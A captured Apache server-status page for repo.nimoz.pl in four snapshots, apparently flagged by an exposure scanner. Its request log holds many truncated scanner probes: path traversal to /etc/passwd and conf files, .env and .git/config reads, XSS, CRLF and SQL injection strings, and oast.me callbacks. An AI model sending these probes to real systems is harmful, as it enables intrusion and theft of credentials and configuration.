Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 02-Oct-2024 00:19:38 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 105 Parent Server MPM Generation: 104 Server uptime: 103 days 11 hours 46 minutes 30 seconds Server load: 0.00 0.00 0.00 Total accesses: 162375 - Total Traffic: 1.0 GB - Total Duration: 58310905 CPU Usage: u121.03 s131.68 cu462.05 cs32.8 - .00836% CPU load .0182 requests/sec - 123 B/second - 6.6 kB/request - 359.113 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 39227no0yes124000 59228no0yes025000 Sum300 174000 ..................................................______________ ________________________________W___.........................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-103-0/0/1411. 0.0011731574674340.00.0010.35 62.210.101.198http/1.1repo.nimoz.pl:443GET /misc/about.jsp HTTP/1.1 0-103-0/0/1305. 0.00117304587250.00.008.99 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.production HTTP/1.1 0-103-0/0/1384. 0.0011731474350940.00.009.46 62.210.101.198http/1.1repo.nimoz.pl:443GET /signin HTTP/1.1 0-103-0/0/1433. 0.00117304634560.00.009.19 62.210.101.198http/1.1 0-103-0/0/1380. 0.00117304979480.00.009.42 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /../../../..//etc/passwd HTTP/1.1 0-103-0/0/1308. 0.00117305007220.00.008.88 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env_1 HTTP/1.1 0-103-0/0/1286. 0.0011731644933840.00.008.50 62.210.101.198http/1.1repo.nimoz.pl:443GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPh 0-103-0/0/1407. 0.00117304579960.00.0011.72 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 0-103-0/0/1481. 0.00117304692720.00.008.60 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.stage HTTP/1.1 0-103-0/0/1251. 0.00117304534250.00.008.27 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /.env.save HTTP/1.1 0-103-0/0/1477. 0.00117305120320.00.0011.35 3.125.18.160http/1.1 0-103-0/0/1414. 0.00117304825870.00.008.93 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /static/..%5c..%5cetc/passwd HTTP/1.1 0-103-0/0/1364. 0.00117304670460.00.0010.05 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /api/.env HTTP/1.1 0-103-0/0/1383. 0.0011732254447310.00.0010.99 62.210.101.198http/1.1repo.nimoz.pl:443GET /KaseyaCwWebService/ManagedIT.asmx HTTP/1.1 0-103-0/0/1294. 0.00117304490210.00.008.16 3.125.18.160http/1.1 0-103-0/0/1371. 0.00117304471230.00.008.62 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/ HTTP/1.1 0-103-0/0/1437. 0.001173464622470.00.0010.05 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1359. 0.001173184862000.00.0011.45 62.210.101.198http/1.1repo.nimoz.pl:443GET /wp-admin/install.php HTTP/1.1 0-103-0/0/1351. 0.00117304475850.00.007.99 45.156.129.71http/1.1 0-103-0/0/1332. 0.001173274601770.00.008.42 62.210.101.198http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-103-0/0/1462. 0.00117305294500.00.008.70 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-touch.png HTTP/1.1 0-103-0/0/1389. 0.00117304791240.00.009.33 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 0-103-0/0/1304. 0.001173414799810.00.008.32 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1333. 0.001173264613610.00.008.48 83.25.200.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-103-0/0/1430. 0.00117304779930.00.0012.70 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-103-0/0/990. 0.00117303634920.00.005.87 45.156.129.70http/1.1 1-103-0/0/874. 0.00117303315950.00.006.41 64.62.197.68h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/887. 0.00117303319990.00.006.81 162.142.125.212http/1.1 1-103-0/0/874. 0.001173183799340.00.005.81 62.210.101.198http/1.1repo.nimoz.pl:443GET /?feed=rss2 HTTP/1.1 1-103-0/0/993. 0.0011733543532490.00.009.37 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/1048. 0.0011732803902850.00.007.95 197.36.134.15http/1.1 1-103-0/0/896. 0.0011732243481250.00.006.45 64.62.197.71http/1.1 1-103-0/0/1023. 0.00117303582180.00.006.16 45.156.129.70http/1.1 1-103-0/0/903. 0.00117303255610.00.005.68 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/957. 0.001173203574680.00.007.20 62.210.101.198http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-103-0/0/1036. 0.00117303295590.00.006.53 3.125.18.160http/1.1 1-103-0/0/929. 0.00117303650320.00.005.72 185.224.128.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/1069. 0.0011731514113830.00.007.19 62.210.101.198http/1.1repo.nimoz.pl:443GET /api/v3/meta HTTP/1.1 1-103-0/0/1004. 0.00117303550940.00.006.57 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /php2.php HTTP/1.1 1-103-0/0/968. 0.0011733093838400.00.005.72 95.214.55.43http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/944. 0.001173253465460.00.006.00 45.156.129.72http/1.1 1-103-0/0/963. 0.00117303366650.00.005.73 45.156.129.70http/1.1 1-103-0/0/948. 0.001173163453900.00.006.11 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-103-0/0/903. 0.00117303323520.00.005.91 209.38.136.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/966. 0.00117303386170.00.006.67 167.94.138.51http/1.1 1-103-0/0/931. 0.00117303618870.00.005.91 64.227.146.243h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-103-0/0/1024. 0.001173303125630.00.005.87 45.156.128.43http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-103-0/0/965. 0.00117303787990.00.006.03 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 1-103-0/0/995. 0.001173203405150.00.007.86 64.227.146.243http/1.1 1-103-0/0/907. 0.00117303200680.00.005.47 209.38.136.79http/1.1 2-86159040/1300/1775_ 72.087288244931340.07.4611.22 162.142.125.212http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-86159040/1273/1690_ 71.9643171254823680.07.319.98 83.25.200.185<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448e93ceb55
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 29-Sep-2024 23:27:21 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 102 Parent Server MPM Generation: 101 Server uptime: 101 days 10 hours 54 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 141624 - Total Traffic: 1005.8 MB - Total Duration: 57746072 CPU Usage: u125.04 s128.73 cu440.85 cs30.35 - .00827% CPU load .0162 requests/sec - 120 B/second - 7.3 kB/request - 407.742 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01905no0yes124000 215904no (old gen)0yes025000 41644no0yes025000 51775no0yes025000 Sum400 199000 ____W____________________.........................______________ ___________.........................____________________________ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-10119050/16/1259_ 1.550284612930.00.1010.08 46.101.111.185http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-10119050/13/1201_ 1.4415174514020.00.078.73 46.101.111.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10119050/12/1254_ 1.501009504281180.00.069.20 12.208.125.142http/1.1vm-repo-prd.nimoz.local:80HEAD /web-console/ServerInfo.jsp HTTP/1.1 0-10119050/7/1300_ 0.86246011194570180.00.048.95 62.210.101.202http/1.1repo.nimoz.pl:443GET /../../../..//etc/passwd HTTP/1.1 0-10119050/14/1282W 1.47004912100.00.079.16 46.101.111.185http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-10119050/15/1200_ 1.44134744284940070.00.098.64 41.232.81.49http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-10119050/13/1165_ 1.4824601154860400.00.088.24 62.210.101.202http/1.1repo.nimoz.pl:443GET /feed/ HTTP/1.1 0-10119050/13/1273_ 1.2704404507540.00.0711.44 62.210.101.202http/1.1repo.nimoz.pl:443POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1 0-10119050/8/1341_ 1.4522594234631190.00.048.33 44.214.5.78http/1.1 0-10119050/14/1163_ 1.511257274464780.00.088.03 206.168.34.123http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-10119050/12/1282_ 1.4824601155047080.00.0611.01 62.210.101.202http/1.1repo.nimoz.pl:443GET /wp-admin/install.php HTTP/1.1 0-10119050/14/1226_ 1.44233385874749300.00.088.58 62.210.101.202http/1.1repo.nimoz.pl:443GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 0-10119050/13/1244_ 1.46209104588620.00.069.75 62.210.101.202http/1.1repo.nimoz.pl:443GET /asdf.php HTTP/1.1 0-10119050/13/1264_ 1.4924601164372180.00.0710.71 62.210.101.202http/1.1repo.nimoz.pl:443GET /?feed=rss2 HTTP/1.1 0-10119050/12/1152_ 1.44233383614423680.00.077.88 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-10119050/24/1272_ 1.471256144401560.00.118.41 62.210.101.202http/1.1repo.nimoz.pl:443GET /.env.local HTTP/1.1 0-10119050/10/1318_ 1.2220911734556880.00.069.78 185.224.128.59http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-10119050/9/1254_ 1.44246016094779210.00.0511.17 62.210.101.202http/1.1repo.nimoz.pl:443GET /..%5c..%5cetc/passwd HTTP/1.1 0-10119050/12/1228_ 1.4412414934402650.00.067.71 206.168.34.123http/1.1 0-10119050/15/1203_ 1.322460114264536540.00.088.15 62.210.101.202http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 0-10119050/20/1343_ 1.20195222280.00.098.47 62.210.101.202http/1.1repo.nimoz.pl:443GET /2mkV9gQ2UTNAPxGGFenKMFOrnwM.php HTTP/1.1 0-10119050/12/1271_ 1.44246013274721200.00.079.08 62.210.101.202http/1.1repo.nimoz.pl:443GET /static/..%5cetc/passwd HTTP/1.1 0-10119050/14/1188_ 1.38225943604712930.00.098.00 44.214.5.78http/1.1 0-10119050/14/1231_ 1.541234544380.00.088.19 46.101.111.185http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-10119050/15/1282_ 1.4610094184703990.00.0912.41 12.208.125.142http/1.1 1-101-0/0/692. 0.002467403538770.00.005.15 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/zestairlove-compacthostmap-panel/../../../. 1-101-0/0/632. 0.002467419423225520.00.005.68 62.210.101.202http/1.1repo.nimoz.pl:443GET /en/WEB-INF/web.xml;.js HTTP/1.1 1-101-0/0/672. 0.002467418883233550.00.006.02 62.210.101.202http/1.1repo.nimoz.pl:443GET /https://.oast.me HTTP/1.1 1-101-0/0/658. 0.002467430633697130.00.005.14 62.210.101.202http/1.1repo.nimoz.pl:443GET /bak.sql.zip HTTP/1.1 1-101-0/0/705. 0.002467403459370.00.008.65 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/volkovlabs-image-panel/../../../../../conf/ 1-101-0/0/776. 0.002467403798640.00.006.51 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/volkovlabs-rss-datasource/../../../../../co 1-101-0/0/660. 0.002467419483403710.00.005.82 62.210.101.202http/1.1repo.nimoz.pl:443GET /https://;@oast.me HTTP/1.1 1-101-0/0/705. 0.002467403497870.00.005.55 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/table/../../../../../conf/defaults.ini HTTP 1-101-0/0/644. 0.002467403152080.00.004.98 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/ovh-warp10-datasource/../../../../../conf/d 1-101-0/0/689. 0.002467418523481990.00.005.94 62.210.101.202http/1.1repo.nimoz.pl:443GET /https://oast.me/https://oast.me/ HTTP/1.1 1-101-0/0/713. 0.002467419793210370.00.005.76 62.210.101.202http/1.1repo.nimoz.pl:443GET /umweb/../etc/passwd HTTP/1.1 1-101-0/0/655. 0.002467418513552280.00.005.00 62.210.101.202http/1.1repo.nimoz.pl:443GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locati 1-101-0/0/708. 0.002467419673904680.00.006.42 62.210.101.202http/1.1repo.nimoz.pl:443GET /webapps.sql.z HTTP/1.1 1-101-0/0/741. 0.002467403461410.00.005.94 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/vertica-grafana-datasource/../../../../../c 1-101-0/0/713. 0.002467419463753650.00.005.10 62.210.101.202http/1.1repo.nimoz.pl:443GET /https://%23.oast.me/ HTTP/1.1 1-101-0/0/681. 0.002467429103384630.00.005.34 62.210.101.202http/1.1repo.nimoz.pl:443GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection H 1-101-0/0/641. 0.002467403270460.00.005.02 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/stagemonitor-elasticsearch-app/../../../../ 1-101-0/0/654. 0.002467403358000.00.005.38 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/speakyourcode-button-panel/../../../../../c 1-101-0/0/667. 0.002467403219930.00.005.19 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/yeya24-chaosmesh-datasource/../../../../../ 1-101-0/0/683. 0.002467403295900.00.005.95 62.210.101.202http/1.1repo.nimoz.pl:443GET /public/plugins/volkovlabs-form-panel/../../../../../conf/d 1-101-0/0/696. 0.002467418203520640.00.005.15 62.210.101.202http/1.1repo.nimoz.pl:443GET /public_html.sql.z HTTP/1.1 1-101-0/0/676. 0.002467428613055430.00.005.17 62.210.101.202http/1.1repo.nimoz.pl:443POST /center/api/files;.js HTTP/1.1 1-10
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44821495e0d
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 27-Sep-2024 23:59:52 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 100 Parent Server MPM Generation: 99 Server uptime: 99 days 11 hours 26 minutes 44 seconds Server load: 0.00 0.00 0.00 Total accesses: 122555 - Total Traffic: 801.2 MB - Total Duration: 41963463 CPU Usage: u94.01 s124.61 cu384.73 cs27.24 - .00734% CPU load .0143 requests/sec - 97 B/second - 6.7 kB/request - 342.405 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 125336no0yes124000 215904no (old gen)0yes025000 425337no0yes025000 Sum300 174000 .........................________W______________________________ ___________........................._________________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-97-0/0/1187. 0.0017278403653920.00.009.44 138.68.6.105http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 0-97-0/0/1130. 0.00172784303545470.00.008.14 138.68.6.105http/1.1 0-97-0/0/1180. 0.0017278403384690.00.008.55 87.236.176.203http/1.1 0-97-0/0/1233. 0.00172784313625090.00.008.33 138.68.6.105http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-97-0/0/1211. 0.00172784293675330.00.008.51 57.151.71.122http/1.1 0-97-0/0/1122. 0.00172784243962910.00.007.95 138.68.6.105http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-97-0/0/1096. 0.0017278403857260.00.007.67 138.68.6.105http/1.1 0-97-0/0/1210. 0.0017278403573220.00.0010.88 172.105.158.219h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97-0/0/1268. 0.0017278403451960.00.007.70 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-97-0/0/1092. 0.0017278403514370.00.007.39 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-97-0/0/1215. 0.00172784224114660.00.0010.40 4.151.226.185http/1.1 0-97-0/0/1152. 0.00172784223777750.00.007.96 138.68.6.105http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-97-0/0/1167. 0.0017278403546640.00.009.09 4.151.226.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97-0/0/1192. 0.0017278403457340.00.0010.09 4.151.226.185http/1.1 0-97-0/0/1082. 0.00172784213485850.00.007.25 4.151.226.185http/1.1 0-97-0/0/1178. 0.0017278403414530.00.007.67 4.151.226.185http/1.1 0-97-0/0/1246. 0.0017278443643980.00.009.08 4.151.226.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97-0/0/1189. 0.00172784263954680.00.0010.60 4.151.226.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97-0/0/1148. 0.00172784243508720.00.007.09 4.151.226.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97-0/0/1133. 0.00172784223589500.00.007.54 172.105.158.219http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-97-0/0/1264. 0.00172784224305730.00.007.79 172.105.158.219http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-97-0/0/1201. 0.0017278403786130.00.008.59 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-97-0/0/1107. 0.00172784293728900.00.007.35 172.105.158.219http/1.1 0-97-0/0/1144. 0.0017278403653800.00.007.49 57.152.79.4http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 0-97-0/0/1202. 0.0017278403580220.00.0011.71 138.68.6.105http/1.1vm-repo-prd.nimoz.local:80GET /password.php HTTP/1.1 1-99253360/13/606_ 2.272994223111180.00.104.25 35.216.152.230http/1.1repo.nimoz.pl:443GET /telescope/requests HTTP/1.1 1-99253360/7/547_ 2.14180102762690.00.054.70 178.211.139.188http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-99253360/6/588_ 2.2841292798800.00.485.02 45.84.89.2http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-99253360/5/573_ 1.6040253005030.00.044.13 143.198.139.70http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-99253360/11/620_ 2.27291902995520.00.047.72 185.16.39.118http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-99253360/6/693_ 2.14303434220.00.475.56 167.172.158.128http/1.1 1-99253360/10/579_ 2.262995212903520.00.074.88 35.216.152.230http/1.1repo.nimoz.pl:443GET /config.json HTTP/1.1 1-99253360/9/627_ 2.250263088870.00.064.65 35.216.152.230http/1.1repo.nimoz.pl:443GET /.git/config HTTP/1.1 1-99253360/12/562W 2.17002757430.00.074.04 167.172.158.128http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-99253360/8/611_ 2.370223025270.00.084.96 167.172.158.128http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-99253360/6/634_ 2.14202729590.00.034.83 167.172.158.128http/1.1 1-99253360/10/566_ 2.17299503126070.00.053.96 185.224.128.47http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-99253360/12/624_ 2.371263496950.00.055.44 167.172.158.128http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-99253360/10/654_ 1.883322947180.00.094.91 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-99253360/9/636_ 2.371223323430.00.024.12 167.172.158.128http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-99253360/9/607_ 1.543272702780.00.094.53 167.172.158.128http/1.1 1-99253360/9/556_ 1.86302856010.00.044.01 167.172.158.128http/1.1 1-99253360/7/570_ 2.14402672630.00.014.42 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-99253360/4/591_ 1.42402801830.00.024.26 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-99253360/12/592_ 2.17402846210.00.054.81 198.235.24.228http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-99253360/10/613_ 2.295252849790.00.024.18 167.172.158.128http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-99253360/10/615_ 2.27180202725260.00.034.45 46.174.191.32http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-99253360/9/608_ 1.44291403264060.00.024.35 45.148.10.242http/1.1 1-99253360/8/645_ 2.17291402957190.00.086.22 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-99253360/6/554_ 1.422994262646590.00.043.89 141.98.11.79http/1.1 2-86159040/810/1285_ 42.68300003384740.04.278.03 35.216.152.230http/1.1 2-86159040/843/1260_ 43.132971503343310.04.427.10 134.122.108.129http/1.1 2-86159040/845/1311
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448968c88f0
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 25-Sep-2024 22:22:18 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 98 Parent Server MPM Generation: 97 Server uptime: 97 days 9 hours 49 minutes 10 seconds Server load: 0.00 0.00 0.00 Total accesses: 122024 - Total Traffic: 796.9 MB - Total Duration: 41957152 CPU Usage: u90.99 s121.85 cu381.86 cs26.97 - .00739% CPU load .0145 requests/sec - 99 B/second - 6.7 kB/request - 343.843 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019200no0yes124000 215904no (old gen)0yes025000 319201no0yes025000 Sum300 174000 ________________W________.........................______________ ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-97192000/4/1186_ 0.69503653920.00.009.44 141.98.11.122http/1.1 0-97192000/6/1130_ 1.135303545470.00.038.14 172.105.158.219h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97192000/6/1180_ 0.86214403384690.00.038.55 87.236.176.203http/1.1 0-97192000/9/1232_ 1.0629503624780.00.028.31 195.178.110.5http/1.1 0-97192000/4/1211_ 1.121972293675330.00.028.51 57.151.71.122http/1.1 0-97192000/6/1121_ 1.10214403962670.00.017.94 68.183.17.85http/1.1repo.nimoz.pl:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 0-97192000/7/1096_ 1.15403857260.00.047.67 172.105.158.219http/1.1 0-97192000/7/1210_ 0.88303573220.00.0310.88 172.105.158.219h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-97192000/7/1267_ 1.175293451960.00.057.70 172.105.158.219http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-97192000/8/1092_ 1.16214903514370.00.047.39 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-97192000/9/1214_ 1.06351604114430.00.0710.39 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-97192000/8/1151_ 1.103516263777530.00.507.95 4.151.229.102http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-97192000/7/1167_ 1.16352103546640.00.029.09 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-97192000/11/1192_ 1.08363203457340.00.0710.09 104.40.75.118http/1.1 0-97192000/5/1081_ 0.85367303485640.00.037.23 199.45.154.116http/1.1 0-97192000/8/1178_ 1.16367303414530.00.077.67 147.185.132.120http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-97192000/6/1245W 0.66003643940.00.019.07 172.105.158.219http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-97192000/6/1189_ 1.070263954680.00.0210.60 199.45.154.116http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-97192000/7/1148_ 1.240243508720.00.017.09 172.105.158.219http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-97192000/8/1133_ 1.241223589500.00.057.54 172.105.158.219http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-97192000/4/1264_ 1.242224305730.00.047.79 172.105.158.219http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-97192000/11/1200_ 1.16303786130.00.028.59 172.105.158.219http/1.1 0-97192000/6/1107_ 1.164293728900.00.037.35 172.105.158.219http/1.1 0-97192000/8/1143_ 1.07403653790.00.047.49 172.105.158.219http/1.1 0-97192000/8/1200_ 1.00403580220.00.0311.71 172.105.158.219h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-95-0/0/585. 0.001998135333108540.00.004.10 62.210.101.203http/1.1repo.nimoz.pl:443POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1.1 1-95-0/0/537. 0.001998139622761530.00.004.63 62.210.101.203http/1.1repo.nimoz.pl:443GET /148.81.110.91.war HTTP/1.1 1-95-0/0/578. 0.001998137942797140.00.004.52 62.210.101.203http/1.1repo.nimoz.pl:443GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1. 1-95-0/0/562. 0.001998139623003310.00.004.05 62.210.101.203http/1.1repo.nimoz.pl:443GET /2024.war HTTP/1.1 1-95-0/0/603. 0.001998139682987680.00.007.61 62.210.101.203http/1.1repo.nimoz.pl:443GET /password.cgi HTTP/1.1 1-95-0/0/677. 0.001998135973431420.00.004.99 62.210.101.203http/1.1repo.nimoz.pl:443GET /portal/attachment_downloadByUrlAtt.action?filePath=file:// 1-95-0/0/567. 0.001998139632902460.00.004.82 62.210.101.203http/1.1repo.nimoz.pl:443POST /Upload/upload_file.php?l=test HTTP/1.1 1-95-0/0/613. 0.001998139503087590.00.004.57 62.210.101.203http/1.1repo.nimoz.pl:443GET /sql.war HTTP/1.1 1-95-0/0/545. 0.001998135222755770.00.003.93 62.210.101.203http/1.1repo.nimoz.pl:443GET /Upload/test/2mTLlXObWlX7HYHtEEIGlKAInvm.php HTTP/1.1 1-95-0/0/597. 0.001998135853023400.00.004.80 62.210.101.203http/1.1repo.nimoz.pl:443GET /user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlv 1-95-0/0/623. 0.001998139712729140.00.004.79 62.210.101.203http/1.1repo.nimoz.pl:443GET /Server/CmxUser.php?pgid=UserList HTTP/1.1 1-95-0/0/552. 0.001998139893125260.00.003.91 62.210.101.203http/1.1repo.nimoz.pl:443GET /backup_3.war HTTP/1.1 1-95-0/0/604. 0.001998139973495530.00.005.34 62.210.101.203http/1.1repo.nimoz.pl:443GET /backups.war HTTP/1.1 1-95-0/0/641. 0.001998139762945160.00.004.80 62.210.101.203http/1.1repo.nimoz.pl:443GET /dump.war HTTP/1.1 1-95-0/0/623. 0.0019981310113323170.00.004.08 62.210.101.203http/1.1repo.nimoz.pl:443GET /overview.asp HTTP/1.1 1-95-0/0/591. 0.001998139652700940.00.004.42 62.210.101.203http/1.1repo.nimoz.pl:443GET /upload.sql.tar.z HTTP/1.1 1-95-0/0/539. 0.001998139892854310.00.003.92 62.210.101.203http/1.1repo.nimoz.pl:443GET /bin.war 